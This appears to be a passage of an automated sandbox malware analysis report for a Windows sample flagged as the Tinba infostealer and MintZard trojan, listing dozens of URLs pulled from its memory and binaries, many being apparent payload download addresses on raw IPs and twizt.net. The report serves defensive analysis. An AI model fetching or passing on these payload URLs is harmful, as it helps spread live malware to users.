                          C:\Users\user\AppData\Local\Temp\524024912.exe75%ReversingLabsWin32.Infostealer.Tinba
                          C:\Windows\sysmablsvr.exe84%ReversingLabsWin32.Trojan.MintZard

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                          http://77.91.77.92/4100%Avira URL Cloudmalware
                          http://77.91.77.92/20%Avira URL Cloudsafe
                          http://twizt.net/chnlk6.exe100%Avira URL Cloudphishing
                          http://77.91.77.92/50%Avira URL Cloudsafe
                          http://77.91.77.92/0%Avira URL Cloudsafe
                          http://77.91.77.92/1/6T0%Avira URL Cloudsafe
                          http://twizt.net/chnlk11.exe100%Avira URL Cloudphishing
                          http://91.202.233.141/lknet.exe100%Avira URL Cloudmalware
                          http://77.91.77.92/6100%Avira URL Cloudmalware
                          http://twizt.net/chnlk20.exe100%Avira URL Cloudphishing
                          http://91.202.233.141/2100%Avira URL Cloudphishing
                          http://twizt.net/chnlk7.exe100%Avira URL Cloudphishing
                          http://91.202.233.141/1JJC:0%Avira URL Cloudsafe
                          http://91.202.233.141/PLTRESA100%Avira URL Cloudphishing
                          http://185.215.113.66/1F0%Avira URL Cloudsafe
                          http://twizt.net/chnlk10.exe100%Avira URL Cloudphishing
                          http://91.202.233.141/0%Avira URL Cloudsafe
                          http://91.202.233.141/1100%Avira URL Cloudmalware
                          http://185.215.113.66/1.0%Avira URL Cloudsafe
                          http://91.202.233.141/lknet.exeCHNOSGDKAUNZGBQABMDEFRITESPLGRnginx.exehttpd.exehttp://twizt.net/chnl0%Avira URL Cloudsafe
                          http://91.202.233.141/5100%Avira URL Cloudphishing
                          http://91.202.233.141/4100%Avira URL Cloudphishing
                          http://77.91.77.92/10%Avira URL Cloudsafe
                          http://77.91.77.92/260%Avira URL Cloudsafe
                          http://91.202.233.141/6100%Avira URL Cloudphishing
                          http://77.91.77.92/1/30%Avira URL Cloudsafe
                          http://185.215.113.66/http://77.91.77.92/http://91.202.233.141/123456%s%s%s:Zone.Identifier%userprof0%Avira URL Cloudsafe
                          http://77.91.77.92/1/60%Avira URL Cloudsafe
                          http://77.91.77.92/3P0%Avira URL Cloudsafe
                          http://91.202.233.141/3100%Avira URL Cloudphishing
                          http://185.215.113.66/0%Avira URL Cloudsafe
                          http://twizt.net/chnlk4.exe100%Avira URL Cloudphishing
                          http://91.202.233.141/PLTRESAA0%Avira URL Cloudsafe
                          http://185.215.113.66/4t0%Avira URL Cloudsafe
                          http://77.91.77.92/510%Avira URL Cloudsafe
                          http://twizt.net/chnlk5.exe100%Avira URL Cloudphishing
                          http://77.91.77.92/1/68l0%Avira URL Cloudsafe
                          http://twizt.net/chnlk16.exe100%Avira URL Cloudphishing
                          http://77.91.77.92/3h0%Avira URL Cloudsafe
                          http://185.215.113.66/4#0%Avira URL Cloudsafe
                          http://twizt.net/chnlk15.exe100%Avira URL Cloudphishing
                          http://twizt.net/chnlk2.exe100%Avira URL Cloudphishing
                          http://twizt.net/chnlk17.exe100%Avira URL Cloudphishing
                          http://185.215.113.66/50%Avira URL Cloudsafe
                          http://91.202.233.141/PLTRESAz0%Avira URL Cloudsafe
                          http://91.202.233.141/PLTRESAMozilla/5.00%Avira URL Cloudsafe
                          http://185.215.113.66/20%Avira URL Cloudsafe
                          http://185.215.113.66/30%Avira URL Cloudsafe
                          http://91.202.233.141/PLTRESAd0%Avira URL Cloudsafe
                          http://185.215.113.66/6100%Avira URL Cloudmalware
                          http://185.215.113.66/1C:0%Avira URL Cloudsafe
                          http://77.91.77.92/26q0%Avira URL Cloudsafe
                          http://91.202.233.141/1C:0%Avira URL Cloudsafe
                          http://91.202.233.141/1Y0%Avira URL Cloudsafe
                          http://twizt.net/chnlk18.exe100%Avira URL Cloudphishing
                          http://185.215.113.66/10%Avira URL Cloudsafe
                          http://91.202.233.141/lkdrv.exe0%Avira URL Cloudsafe
                          http://91.202.233.141/230%Avira URL Cloudsafe
                          http://twizt.net/chnlk3.exe100%Avira URL Cloudphishing
                          http://twizt.net/chnlk14.exe100%Avira URL Cloudphishing
                          http://91.202.233.141/65P0%Avira URL Cloudsafe
                          http://twizt.net/chnlk8.exe100%Avira URL Cloudphishing
                          http://77.91.77.92/2/60%Avira URL Cloudsafe
                          http://77.91.77.92/2/50%Avira URL Cloudsafe
                          http://185.215.113.66/5%0%Avira URL Cloudsafe
                          http://twizt.net/chnlk13.exe100%Avira URL Cloudphishing
                          http://91.202.233.141/H0%Avira URL Cloudsafe
                          http://91.202.233.141/6.100%Avira URL Cloudphishing
                          http://91.202.233.141/1K0%Avira URL Cloudsafe
                          http://twizt.net/chnlk19.exe100%Avira URL Cloudphishing
                          http://91.202.233.141/lksrv.exe0%Avira URL Cloudsafe
                          http://77.91.77.92/1Microsoft.Wi0%Avira URL Cloudsafe
                          http://77.91.77.92/1:0%Avira URL Cloudsafe
                          http://91.202.233.141/6%0%Avira URL Cloudsafe
                          http://91.202.233.141/PLTRESA~0%Avira URL Cloudsafe
                          http://185.215.113.66/6o0%Avira URL Cloudsafe
                          http://twizt.net/chnlk9.exe100%Avira URL Cloudphishing
                          http://185.215.113.66/5ystem320%Avira URL Cloudsafe
                          http://twizt.net/chnlk12.exe100%Avira URL Cloudphishing
                          http://twizt.net/chnlk1.exe100%Avira URL Cloudphishing

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://185.215.113.66/1true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://77.91.77.92/4sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://77.91.77.92/file.exe, sysmablsvr.exe.0.drtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://77.91.77.92/5sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://77.91.77.92/1/6Tsysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://77.91.77.92/2sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234854329.000000000221B000.00000004.00000010.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://twizt.net/chnlk11.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://twizt.net/chnlk6.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://91.202.233.141/lknet.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://77.91.77.92/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://twizt.net/chnlk20.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://91.202.233.141/file.exe, sysmablsvr.exe.0.drtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.66/1Fsysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/PLTRESA524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://schemas.xmlsoap.org/soap/envelope/sysmablsvr.exe.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://91.202.233.141/1sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://91.202.233.141/2sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://twizt.net/chnlk7.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://91.202.233.141/1JJC:sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://twizt.net/chnlk10.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://185.215.113.66/1.sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/lknet.exeCHNOSGDKAUNZGBQABMDEFRITESPLGRnginx.exehttpd.exehttp://twizt.net/chnlsysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://77.91.77.92/26sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/5sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://77.91.77.92/1sysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://91.202.233.141/3sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://91.202.233.141/4sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://77.91.77.92/1/3sysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://77.91.77.92/3Psysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.66/http://77.91.77.92/http://91.202.233.141/123456%s%s%s:Zone.Identifier%userproffile.exe, sysmablsvr.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://77.91.77.92/1/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://twizt.net/chnlk4.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://185.215.113.66/file.exe, sysmablsvr.exe.0.drtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/PLTRESAA524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.66/4tsysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://twizt.net/chnlk5.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://77.91.77.92/1/68lsysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://twizt.net/chnlk16.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://77.91.77.92/51sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/sysmablsvr.exe.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://185.215.113.66/4#sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://77.91.77.92/3hsysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://twizt.net/chnlk17.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://twizt.net/chnlk15.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://twizt.net/chnlk2.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://91.202.233.141/PLTRESAz524024912.exe, 00000007.00000002.2490877099.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.66/5sysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/PLTRESAMozilla/5.0524024912.exe, 00000007.00000000.2434511449.0000000000222000.00000002.00000001.01000000.00000008.sdmp, 524024912.exe, 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmp, 524024912.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.66/3sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.66/2sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/PLTRESAd524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.66/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://185.215.113.66/1C:sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878878518.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878685410.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://77.91.77.92/26qsysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/1C:sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://91.202.233.141/1Ysysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://twizt.net/chnlk18.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://91.202.233.141/lkdrv.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://twizt.net/chnlk3.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          		unknown
